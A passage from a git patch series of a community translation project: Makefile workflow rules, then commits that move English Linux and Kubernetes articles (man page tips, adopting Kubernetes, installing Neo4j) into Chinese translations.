$(CHANGE_FILE) | wc -l) = 0 ] + [ $(shell grep '^A\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] + [ $(shell grep -v '^A\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: - [ $(shell grep '^M\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-completed: - [ $(shell grep '^D\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+translated/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' rule-translation-revised: - [ $(shell grep '^M\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s\+translated/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-published: - [ $(shell grep '^D\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+published/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s\+translated/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+published/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' From 16583e9bf8e9bb96279fbb50eefc5f654bcfbe0c Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 22:39:52 +0800 Subject: [PATCH 0711/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2019=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=BA=8C=2022:39:5?= =?UTF-8?q?2=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...1215 Learn To Use Man Pages Efficiently.md | 169 ------------------ ...1215 Learn To Use Man Pages Efficiently.md | 168 +++++++++++++++++ 2 files changed, 168 insertions(+), 169 deletions(-) delete mode 100644 sources/tech/20171215 Learn To Use Man Pages Efficiently.md create mode 100644 translated/tech/20171215 Learn To Use Man Pages Efficiently.md diff --git a/sources/tech/20171215 Learn To Use Man Pages Efficiently.md b/sources/tech/20171215 Learn To Use Man Pages Efficiently.md deleted file mode 100644 index db0d90e75a..0000000000 --- a/sources/tech/20171215 Learn To Use Man Pages Efficiently.md +++ /dev/null @@ -1,169 +0,0 @@ -translating by lujun9972 -Learn To Use Man Pages Efficiently -====== -A while ago, we have published a brief guide that described how to easily [**recall forgotten Linux commands**][1]. That guide was really quite useful for those having trouble at remembering commands. Today, we are going to learn how to get want you want from man pages effectively and quickly. As you might already know, a typical man page is divided into several parts, each with a distinct heading. You might need to scroll down for quite a long time when you're looking for a particular information on the specific flag/option. This is really inefficient and time consuming process. This is why it is important to learn to use man pages efficiently to find out what exactly you want to know. - -In this brief tutorial, I will be sharing few important tricks which I use daily when referring man pages. - -### Learn To Use Man Pages Efficiently - -#### Basic use - -As we all know, we can open a man page of a command, for example "mkdir", using command: -``` -man mkdir -``` - -Use **spacebar** , **d** , **b** and **up** / **down** arrows to browse through the man page. To go to the end of the man page, press **End** key and to go to the fist page of a man page, press **Home** key. Press **h** key in the currently opened man page to know all useful keyboard shortcuts and general usage information. - -[![][2]][3] - -Press **q** to exit the man page. - -#### Recall a forgotten command - -For those who don't know which command they actually want can refer the link that I attached in the first paragraph of this guide. We also can do it using man pages too. Let us say, you want to create a directory, but you couldn't remember what command we use to create a directory. - -To do so, use grep command with man: -``` -man -k directory | grep create -``` - -Sample output would be: -``` -CURLOPT_NEW_DIRECTORY_PERMS (3) - permissions for remotely created directories -libssh2_sftp_mkdir_ex (3) - create a directory on the remote file system -mkdir (2) - create a directory -mkdirat (2) - create a directory -mkdtemp (3) - create a unique temporary directory -mkdtemp (3p) - create a unique directory or file -mkfontdir (1) - create an index of X font files in a directory -mklost+found (8) - create a lost+found directory on a mounted Linux second extended file... -mkstemp (3p) - create a unique directory -mktemp (1) - create a temporary file or directory -pam_mkhomedir (8) - PAM module to create users home directory -``` - -[![][2]][4] - -Just read the description of the each command and pick the suitable command. Ahh, you now remember. **mkdir** is the one that you 're looking for, isn't it? It's that simple. - -#### Search within man pages - -Once you're in a man page, you may want to look for specific string. To do so, just type **/** (forward slash) followed by your search string like below -``` -/ or -``` - -Let us say, you're in man page of mount command and wants to look for information on the **- bind** option. To do so, type: -``` -/bind -``` - -[![][2]][5] - -Any matches to the search string in the current man page will be highlighted. - -[![][2]][6] - -Press **" n"** and **" SHIFT+n"** to browse through the next and previous matches. - -/pattern(or string) - will search forward for (N-th) matching line. You can also do the backward searching using **?pattern**. This can be helpful if you are at the end or middle of the man page. -``` -?bind -``` - -To display only matching lines, type: -``` -&bind -``` - -[![][2]][7] - -In this search method, you don't have to use "n" or "shift+n" to scroll through next and previous matches. **& pattern** will only display the matching lines that contains the search term, everything else will be omitted. - -#### Search matches without opening man page - -It is also possible to search for information on the specific option without opening man page. - -For instance, you're looking for information on the **-m** option of **mkdir** command. To find it out, run: -``` -man mkdir | grep -e '-m' -``` - -Or, -``` -man mkdir | grep -- '-m' -``` - -[![][2]][8] - -This command will display the **first occurrence** of **-m** in the man page of mkdir command. As we see in the above command -m represents MODE (chmod). - -If you want to see the complete man page of mkdir command but skip directly to the first occurrence of **-m** , use the following command: -``` -man mkdir | less +/-m -``` - -[![][2]][9] - -Here is another example: -``` -man mount | less +/--bind -``` - -[![][2]][10] - -Press "n" and "SHIFT+n" to browse through the next and previous matches. - -Also read:[3 Good Alternatives To Man Pages Every Linux User Should Know][11] - -#### Export entire man page to text file - -We can export the entire man page of a specific command to a text file. To do so, just run the following command: -``` -man mount > mount.txt -``` - -This command will export the man page of the mount command to mount.txt file and save it in the current working directory. - -It is also possible to obtain a simpler version of a man page, without backspaces and underscores, using the following command. -``` -man mount | col -b > mount.txt -``` - -To know more details about man pages, run: -``` -man man -``` - -This command will display the man page about the man pages. These tricks are just basics but enough to get going. These tricks will save you a lot of time and avoid unlimited scrolling. - -And, that's all for today. Hope you find this useful. More good stuffs to come. Stay tuned! - -Cheers! - - - --------------------------------------------------------------------------------- - -via: https://www.ostechnix.com/learn-use-man-pages-efficiently/ - -作者:[][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.ostechnix.com -[1]:https://www.ostechnix.com/easily-recall-forgotten-linux-commands/ -[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 -[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-4.png () -[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-3.png () -[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-5.png () -[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-6.png () -[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-8.png () -[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-1.png () -[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-2-1.png () -[10]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-7.png () -[11]:https://www.ostechnix.com/3-good-alternatives-man-pages-every-linux-user-know/ diff --git a/translated/tech/20171215 Learn To Use Man Pages Efficiently.md b/translated/tech/20171215 Learn To Use Man Pages Efficiently.md new file mode 100644 index 0000000000..4ab4083e0c --- /dev/null +++ b/translated/tech/20171215 Learn To Use Man Pages Efficiently.md @@ -0,0 +1,168 @@ +学习如何高效地使用 Man 页 +====== +不久前,我们发布了一篇简短的指引描述了如何轻易地[回忆起忘记的 Linux 命令 ][1]。那篇指引对于无法记住命令的人来说真的非常有用。今天,我们就来学习一下如何高效而又迅速第从 man 页中获取你所需要的信息。如你所知,一个标准的 man 页分成很多个部分,每部分都有一个独立的标题。当你想查看特定的标志/选项时,可能需要向下滚动很长时间才能找到。这这是个效率底下而且很耗时间的过程。这也是为什么学会高效使用 man 页来精确定位你想要的内容非常的重要。 + +在本文中,我会分享一些常用的跟 man 页相关的重要技巧。 + +### 学习高效地使用 Man 页 + +#### 基础用法 + +我们都知道,我们可以使用类似下面的命令来打开关于某个命令(比如 “mkdir”) 的 man 页: +``` +man mkdir +``` + +可以使用 **spacebar**,**d**,**b** 以及 **up** / **down** 箭头来浏览 man 页。要跳转道 man 页的末尾,可以按 **End** 键而想跳转到 man 页的头部则可以按 **Home** 键。在当前打开的 man 页中按下 **h** 键会显示所有有用的键盘快捷键和一般用法。 + +[![][2]][3] + +按 **q** 可以退出 man 页。 + +#### 回忆起忘记的命令 + +对于那些不知道想要哪个命令的家伙,可以去查看一下我第一段中提到的那个链接。使用 man 页我们也能做到这一点。假设说,你想要创建一个目录,而你忘记了使用哪个命令来创建目录。 + +为了回忆起那个忘记的命令,可以将 man 和 grep 命令联用: +``` +man -k directory | grep create +``` + +输出结果为: +``` +CURLOPT_NEW_DIRECTORY_PERMS (3) - permissions for remotely created directories +libssh2_sftp_mkdir_ex (3) - create a directory on the remote file system +mkdir (2) - create a directory +mkdirat (2) - create a directory +mkdtemp (3) - create a unique temporary directory +mkdtemp (3p) - create a unique directory or file +mkfontdir (1) - create an index of X font files in a directory +mklost+found (8) - create a lost+found directory on a mounted Linux second extended file。。。 +mkstemp (3p) - create a unique directory +mktemp (1) - create a temporary file or directory +pam_mkhomedir (8) - PAM module to create users home directory +``` + +[![][2]][4] + +你只需要阅读一下每个命令的描述然后挑选出合适的命令就行了。啊,现在你记起来了。**mkdir** 正式你想要的,对吧?就是那么简单。 + +#### 在 man 页中搜索 + +若你在 man 页中想要查找特定字符串。只需要输入 **/** (前斜线) 再加上你想要搜索的字符串,像这样 +``` +/ or +``` + +假设你正在查看 mount 命令的 man 页,想要寻找关于 **- bind** 选项的相关信息。可以输入: +``` +/bind +``` + +[![][2]][5] + +当前 man 页中任何匹配搜索字符串的内容都会被高亮显示。 + +[![][2]][6] + +按下 **"n"** 和 **"SHIFT+n"** 来查看下一个/上一个匹配的地方。 + +/模式(或者说字符串) - 会向前搜索匹配行。你也可以使用 **?pattern** 进行向后搜索。这当你在 man 页的末尾或中间位置时非常有用。 +``` +?bind +``` + +若想只显示匹配行,输入: +``` +&bind +``` + +[![][2]][7] + +使用这种方法,你无需使用 "n" 和 "shift+n" 来滚动道下一个/上一个匹配的位置。**& pattern** 只会显示那些包含搜索内容的行,其他的内容全都被省略掉。 + +#### Search matches without opening man page + +也可以在不打开 man 页的前提下搜索指定选项的信息。 + +比如,你想了解 **mkdir** 命令中的 **-m** 选项的相关信息。可以运行: +``` +man mkdir | grep -e '-m' +``` + +或者, +``` +man mkdir | grep -- '-m' +``` + +[![][2]][8] + +这个命令会显示出 mkdir 命令 man 页中 **第一次出现** **-m** 时的内容。从上面命令中我们可以看到 -m 表示的是 MODE (chmod)。 + +如果你想阅读 mkdir 命令的完整 man 页,但是要跳过第一次出现 **-m** 之前的内容,可以使用下面命令: +``` +man mkdir | less +/-m +``` + +[![][2]][9] + +这是另一个例子: +``` +man mount | less +/--bind +``` + +[![][2]][10] + +按下 "n" 或 "SHIFT+n" 可以浏览下一个/上一个匹配的位置。 + +参考阅读 :[3 Good Alternatives To Man Pages Every Linux User Should Know][11] + +#### 将完整的 man 页导出道文本文件中 + +我们可以将指定命令的完整 man 页导出成文本文件。方法是运行下面命令: +``` +man mount > mount.txt +``` + +该命令会将 mount 命令的 man 页导出到当前目录的 mount.txt 文件中。 + +也可以获取一个简化版的 man 页,没有退格和下划线,方法是使用下面命令。 +``` +man mount | col -b > mount.txt +``` + +要了解更多关于 man 页的详细信息,运行: +``` +man man +``` + +该命令会显示出关于 man 页的 man 页。这些技巧都很基础但很实用。它们会节省你很多的时间而且能免去很多的滚动操作。 + +今天的内容就到这了。希望对你有帮助。更多好文即将到来。准备好哦! + +Cheers! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/learn-use-man-pages-efficiently/ + +作者:[][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com +[1]:https://www.ostechnix.com/easily-recall-forgotten-linux-commands/ +[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-4.png () +[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-3.png () +[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-5.png () +[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-6.png () +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-8.png () +[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-1.png () +[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-2-1.png () +[10]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-7.png () +[11]:https://www.ostechnix.com/3-good-alternatives-man-pages-every-linux-user-know/ From 4397a37ae4f95563619adc471031e7b40eeb7f99 Mon Sep 17 00:00:00 2001 From: Unknown Date: Tue, 19 Dec 2017 22:55:27 +0800 Subject: [PATCH 0712/1627] translated translated --- ...171120 Adopting Kubernetes step by step.md | 95 ------------------- ...171120 Adopting Kubernetes step by step.md | 90 ++++++++++++++++++ 2 files changed, 90 insertions(+), 95 deletions(-) delete mode 100644 sources/tech/20171120 Adopting Kubernetes step by step.md create mode 100644 translated/tech/20171120 Adopting Kubernetes step by step.md diff --git a/sources/tech/20171120 Adopting Kubernetes step by step.md b/sources/tech/20171120 Adopting Kubernetes step by step.md deleted file mode 100644 index 0d10282dc7..0000000000 --- a/sources/tech/20171120 Adopting Kubernetes step by step.md +++ /dev/null @@ -1,95 +0,0 @@ -translating by aiwhj - -Adopting Kubernetes step by step -============================================================ - -Why Docker and Kubernetes? - -Containers allow us to build, ship and run distributed applications. They remove the machine constraints from applications and lets us create a complex application in a deterministic fashion. - -Composing applications with containers allows us to make development, QA and production environments closer to each other (if you put the effort in to get there). By doing so, changes can be shipped faster and testing a full system can happen sooner. - -[Docker][1] — the containerization platform — provides this, making software  _independent_  of cloud providers. - -However, even with containers the amount of work needed for shipping your application through any cloud provider (or in a private cloud) is significant. An application usually needs auto scaling groups, persistent remote discs, auto discovery, etc. But each cloud provider has different mechanisms for doing this. If you want to support these features, you very quickly become cloud provider dependent. - -This is where [Kubernetes][2] comes in to play. It is an orchestration system for containers that allows you to manage, scale and deploy different pieces of your application — in a standardised way — with great tooling as part of it. It’s a portable abstraction that’s compatible with the main cloud providers (Google Cloud, Amazon Web Services and Microsoft Azure all have support for Kubernetes). - -A way to visualise your application, containers and Kubernetes is to think about your application as a shark — stay with me — that exists in the ocean (in this example, the ocean is your machine). The ocean may have other precious things you don’t want your shark to interact with, like [clown fish][3]. So you move you shark (your application) into a sealed aquarium (Container). This is great but not very robust. Your aquarium can break or maybe you want to build a tunnel to another aquarium where other fish live. Or maybe you want many copies of that aquarium in case one needs cleaning or maintenance… this is where Kubernetes clusters come to play. - - -![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg) -Evolution to Kubernetes - -With Kubernetes being supported by the main cloud providers, it makes it easier for you and your team to have environments from  _development _ to  _production _ that are almost identical to each other. This is because Kubernetes has no reliance on proprietary software, services or infrastructure. - -The fact that you can start your application in your machine with the same pieces as in production closes the gaps between a development and a production environment. This makes developers more aware of how an application is structured together even though they might only be responsible for one piece of it. It also makes it easier for your application to be fully tested earlier in the pipeline. - -How do you work with Kubernetes? - -With more people adopting Kubernetes new questions arise; how should I develop against a cluster based environment? Suppose you have 3 environments — development, QA and production — how do I fit Kubernetes in them? Differences across these environments will still exist, either in terms of development cycle (e.g. time spent to see my code changes in the application I’m running) or in terms of data (e.g. I probably shouldn’t test with production data in my QA environment as it has sensitive information). - -So, should I always try to work inside a Kubernetes cluster, building images, recreating deployments and services while I code? Or maybe I should not try too hard to make my development environment be a Kubernetes cluster (or set of clusters) in development? Or maybe I should work in a hybrid way? - - -![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg) -Development with a local cluster - -If we carry on with our metaphor, the holes on the side represent a way to make changes to our app while keeping it in a development cluster. This is usually achieved via [volumes][4]. - -A Kubernetes series - -The Kubernetes series repository is open source and available here: - -### [https://github.com/red-gate/ks][5] - -We’ve written this series as we experiment with different ways to build software. We’ve tried to constrain ourselves to use Kubernetes in all environments so that we can explore the impact these technologies will have on the development and management of data and the database. - -The series starts with the basic creation of a React application hooked up to Kubernetes, and evolves to encompass more of our development requirements. By the end we’ll have covered all of our application development needs  _and_  have understood how best to cater for the database lifecycle in this world of containers and clusters. - -Here are the first 5 episodes of this series: - -1. ks1: build a React app with Kubernetes - -2. ks2: make minikube detect React code changes - -3. ks3: add a python web server that hosts an API - -4. ks4: make minikube detect Python code changes - -5. ks5: create a test environment - -The second part of the series will add a database and try to work out the best way to evolve our application alongside it. - -By running Kubernetes in all environments, we’ve been forced to solve new problems as we try to keep the development cycle as fast as possible. The trade-off being that we are constantly exposed to Kubernetes and become more accustomed to it. By doing so, development teams become responsible for production environments, which is no longer difficult as all environments (development through production) are all managed in the same way. - -What’s next? - -We will continue this series by incorporating a database and experimenting to find the best way to have a seamless database lifecycle experience with Kubernetes. - - _This Kubernetes series is brought to you by Foundry, Redgate’s R&D division. We’re working on making it easier to manage data alongside containerised environments, so if you’re working with data and containerised environments, we’d like to hear from you — reach out directly to the development team at _ [_foundry@red-gate.com_][6] - -* * * - - _We’re hiring_ _. Are you interested in uncovering product opportunities, building _ [_future technology_][7] _ and taking a startup-like approach (without the risk)? Take a look at our _ [_Software Engineer — Future Technologies_][8] _ role and read more about what it’s like to work at Redgate in _ [_Cambridge, UK_][9] _._ - --------------------------------------------------------------------------------- - -via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe - -作者:[santiago arias][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://medium.com/@santiaago?source=post_header_lockup -[1]:https://www.docker.com/what-docker -[2]:https://kubernetes.io/ -[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM -[4]:https://kubernetes.io/docs/concepts/storage/volumes/ -[5]:https://github.com/red-gate/ks -[6]:mailto:foundry@red-gate.com -[7]:https://www.red-gate.com/foundry/ -[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies -[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge diff --git a/translated/tech/20171120 Adopting Kubernetes step by step.md b/translated/tech/20171120 Adopting Kubernetes step by step.md new file mode 100644 index 0000000000..3e9015d155 --- /dev/null +++ b/translated/tech/20171120 Adopting Kubernetes step by step.md @@ -0,0 +1,90 @@ +一步步采用 Kubernetes +============================================================ + +为什么选择 Docker 和 Kubernetes 呢? + +容器允许我们构建,发布和运行分布式应用。他们使应用程序摆脱了机器限制,让我们以一定的方式创建一个复杂的应用程序。 + +使用容器编写应用程序可以使开发,QA 更加接近生产环境(如果你努力这样做的话)。通过这样做,可以更快地发布修改,并且可以更快地测试整个系统。 + +[Docker][1] 可以使软件独立于云提供商的容器化平台。 + +但是,即使使用容器,移植应用程序到任何一个云提供商(或私有云)所需的工作量也是非常重要的。应用程序通常需要自动伸缩组,持久远程光盘,自动发现等。但是每个云提供商都有不同的机制。如果你想使用这些功能,很快你就会变的依赖于云提供商。 + +这正是 [Kubernetes][2] 登场的时候。它是一个容器编排系统,它允许您以一定的标准管理,缩放和部署应用程序的不同部分,并且成为其中的重要工具。它抽象出来以兼容主要云的提供商(Google Cloud,Amazon Web Services 和 Microsoft Azure 都支持 Kubernetes)。 + +通过一个方法来想象一下应用程序,容器和 Kubernetes 。应用程序可以视为一条身边的鲨鱼,它存在于海洋中(在这个例子中,海洋就是您的机器)。海洋中可能还有其他一些宝贵的东西,但是你不希望你的鲨鱼与小丑鱼有什么关系。所以需要把你的鲨鱼(你的应用程序)移动到一个密封的水族馆中(容器)。这很不错,但不是特别的健壮。你的水族馆可能会打破,或者你想建立一个通道连接到其他鱼类生活的另一个水族馆。也许你想要许多这样的水族馆,以防需要清洁或维护... 这正是应用 Kubernetes 集群的地方。 + +![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg) +Evolution to Kubernetes + +Kubernetes 由云提供商提供支持,从开发到生产,它使您和您的团队能够更容易地拥有几乎相同的环境。这是因为 Kubernetes 不依赖专有软件,服务或另外一些基础设施。 + +事实上,您可以在您的机器中使用与生产环境相同的部件启动应用程序,从而缩小了开发和生产环境之间的差距。这使得开发人员更了解应用程序是如何构建在一起的,尽管他们可能只负责应用程序的一部分。这也使得在开发流程中的应用程序更容易的快速完成测试。 + +如何使用 Kubernetes 工作? + +随着更多的人采用 Kubernetes,新的问题出现了;应该如何针对基于集群环境开发?假设有 3 个环境,开发,质量保证和生产, 如何适应 Kubernetes?这些环境之间仍然存在着差异,无论是在开发周期(例如:在正在运行的应用程序中看到修改代码所花费的时间)还是与数据相关的(例如:我不应该在我的质量保证环境中测试生产数据,因为它里面有敏感信息) + +那么,我是否应该总是在 Kubernetes 集群中编码,构建映像,重新部署服务?或者,我是否不应该尽力让我的开发环境也成为一个 Kubernetes 集群的其中之一(或一组集群)呢?还是,我应该以混合方式工作? + +![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg) +Development with a local cluster + +如果继续我们之前的比喻,使其保持在一个开发集群中的同时侧面的通道代表着修改应用程序的一种方式。这通常通过[volumes][4]来实现 + +一个 Kubernetes 系列 + +Kubernetes 系列资源是开源的,可以在这里找到: + +### [https://github.com/red-gate/ks][5] + +我们写这个系列作为练习以不同的方式构建软件。我们试图约束自己在所有环境中都使用 Kubernetes,以便我们可以探索这些技术对数据和数据库的开发和管理造成影响。 + +这个系列从使用 Kubernetes 创建基本的React应用程序开始,并逐渐演变为能够覆盖我们更多开发需求的系列。最后,我们将覆盖所有应用程序的开发需求,并且理解在数据库生命周期中如何最好地迎合容器和集群。 + +以下是这个系列的前 5 部分: + +1. ks1: 使用 Kubernetes 构建一个React应用程序 + +2. ks2: 使用 minikube 检测 React 代码的更改 + +3. ks3: 添加一个提供 API 的 Python Web 服务器 + +4. ks4: 使 minikube 检测 Python 代码的更改 + +5. ks5: 创建一个测试环境 + +本系列的第二部分将添加一个数据库,并尝试找出最好的方式来发展我们的应用程序。 + + +通过在所有环境中运行 Kubernetes,我们被迫在解决新问题的时候也尽量保持开发周期。我们不断尝试 Kubernetes,并越来越习惯它。通过这样做,开发团队都可以对生产环境负责,这并不困难,因为所有环境(从开发到生产)都以相同的方式进行管理。 + +下一步是什么? + +我们将通过整合数据库和练习来继续这个系列,以找到使用 Kubernetes 获得数据库生命周期的最佳体验方法。 + +这个 Kubernetes 系列是由 Redgate 研发部门的 Foundry 提供。我们正在努力使数据和容器的管理变得更加容易,所以如果您正在处理数据和容器,我们希望听到您的意见,请直接联系我们的开发团队。 [_foundry@red-gate.com_][6] +* * * + +我们正在招聘。您是否有兴趣开发产品,创建[未来技术][7] 并采取类似创业的方法(没有风险)?看看我们的[软件工程师 - 未来技术][8]的角色吧,并阅读更多关于在 [英国剑桥][9]的 Redgate 工作的信息。 +-------------------------------------------------------------------------------- + +via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe + +作者:[santiago arias][a] +译者:[aiwhj](https://github.com/aiwhj) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://medium.com/@santiaago?source=post_header_lockup +[1]:https://www.docker.com/what-docker +[2]:https://kubernetes.io/ +[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM +[4]:https://kubernetes.io/docs/concepts/storage/volumes/ +[5]:https://github.com/red-gate/ks +[6]:mailto:foundry@red-gate.com +[7]:https://www.red-gate.com/foundry/ +[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies +[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge From 0a50818af7573cc618726106fa110eb6236ca7db Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 19 Dec 2017 23:16:32 +0800 Subject: [PATCH 0713/1627] PRF:20170717 Neo4j and graph databases Getting started.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @happygeorge01 恭喜你,完成了第一篇翻译! --- ...o4j and graph databases Getting started.md | 55 +++++++++---------- 1 file changed, 25 insertions(+), 30 deletions(-) diff --git a/translated/tech/20170717 Neo4j and graph databases Getting started.md b/translated/tech/20170717 Neo4j and graph databases Getting started.md index 6eb40e35c4..5f5a9a415c 100644 --- a/translated/tech/20170717 Neo4j and graph databases Getting started.md +++ b/translated/tech/20170717 Neo4j and graph databases Getting started.md @@ -1,48 +1,43 @@ -Neo4j 和图数据库: 开始 +Neo4j 和图数据库起步 ============================================================ -### 这是三篇文章系列中的第二篇,安装Neo4j并通过使用网页端在图中插入和查询数据。 +> 在这个三篇文章系列中的第二篇中,安装 Neo4j 并通过网页客户端来在图中插入和查询数据。 ![Neo4j 和图数据库: 开始](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started") -图片来源 : opensource.com +在本系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页客户端在图中插入并查询数据。 -在系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页端在图中插入并查询数据。 +可通过 [他们的网站][10] 下载社区版的 Neo4j!你可以下载 Windows 或 OSX 版来测试,也有各 Linux 发行版对应的版本,还有 Docker 版。 -下载社区版的 Neo4j 可通过此 [传送门][10]!你可以下载 Windows 或 OSX 版来测试,也有各 Linux 发行版对应的版本,还有 Docker 版。 - -我会在 Debian 9 (stretch) 上安装软件。你可通过 [传送门][11] 来查看完整说明。如果你正在使用 Debian 8 (jessie)或更老的版本,你可以安装现在的版本,但会出现的问题是 jessie 中并没有安装 Neo4j 运行所需要的 Java 8 环境。 +我会在 Debian 9 (stretch) 上安装软件。你可在 [这里][11] 查看完整说明。如果你正在使用 Debian 8 (jessie) 或更老的版本,你可以安装当前的版本,但会出现的一点小问题是 jessie 中并没有安装 Neo4j 运行所需要的 Java 8 环境。 ``` wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add - echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install neo4j ``` -在我的系统中,因为有些不可知的原因,只有在我创建 **/var/run/neo4j** 之后才会它正常启动。Neo4j 也给了最大打开文件数 (maximum open files) 的警告,但因为是测试环境所以不太需要关心这个问题。Neo4j 默认只会监听本机 localhost 。无论我使用的是服务器而你使用的 Debian 是台式机都是可以的。同时我在 **/etc/neo4j/neo4j.conf** 中取消注释了下面这行: 